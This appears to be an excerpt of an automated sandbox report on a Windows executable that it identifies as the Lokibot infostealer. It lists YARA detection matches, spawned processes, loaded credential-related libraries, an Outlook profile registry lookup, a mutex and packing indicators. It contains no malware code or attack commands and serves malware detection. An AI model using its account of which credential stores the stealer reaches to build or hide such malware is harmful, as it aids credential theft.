            Source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: lqoUUYTMsL.exe PID: 7104, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: Process Memory Space: lqoUUYTMsL.exe PID: 6408, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: lqoUUYTMsL.exeStatic PE information: Section: C)Ez ZLIB complexity 1.0003355449756888
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/3@1/1
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_012DA9B6 AdjustTokenPrivileges,0_2_012DA9B6
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_012DA97F AdjustTokenPrivileges,0_2_012DA97F
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,2_2_0040434D
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\lqoUUYTMsL.exe.logJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeMutant created: NULL
            Source: lqoUUYTMsL.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: lqoUUYTMsL.exeReversingLabs: Detection: 79%
            Source: unknownProcess created: C:\Users\user\Desktop\lqoUUYTMsL.exe "C:\Users\user\Desktop\lqoUUYTMsL.exe"
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exe
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exe
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exe
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exe
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exeJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exeJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exeJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess created: C:\Users\user\Desktop\lqoUUYTMsL.exe C:\Users\user\Desktop\lqoUUYTMsL.exeJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
            Source: lqoUUYTMsL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
            Source: lqoUUYTMsL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 0.2.lqoUUYTMsL.exe.6a83510.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.lqoUUYTMsL.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.lqoUUYTMsL.exe.6a83510.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.lqoUUYTMsL.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1656396355.0000000006A83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1643221958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654874181.00000000036A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654874181.00000000036DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654874181.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1654874181.0000000003520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: lqoUUYTMsL.exe PID: 7104, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lqoUUYTMsL.exe PID: 6408, type: MEMORYSTR
            Source: lqoUUYTMsL.exeStatic PE information: section name: C)Ez
            Source: lqoUUYTMsL.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_05600769 push ds; iretd 0_2_0560076F
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_018B741A push ebp; iretd 0_2_018B7421
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A0569 push edi; retf 0_2_056A056F
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A1821 push esp; retf 0_2_056A1822
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A1817 push esp; retf 0_2_056A1818
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A2739 push cs; iretd 0_2_056A273A
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 0_2_056A2A87 push esp; ret 0_2_056A2A89
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AD4
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AFC
            Source: lqoUUYTMsL.exeStatic PE information: section name: C)Ez entropy: 7.99934222787656
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\lqoUUYTMsL.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
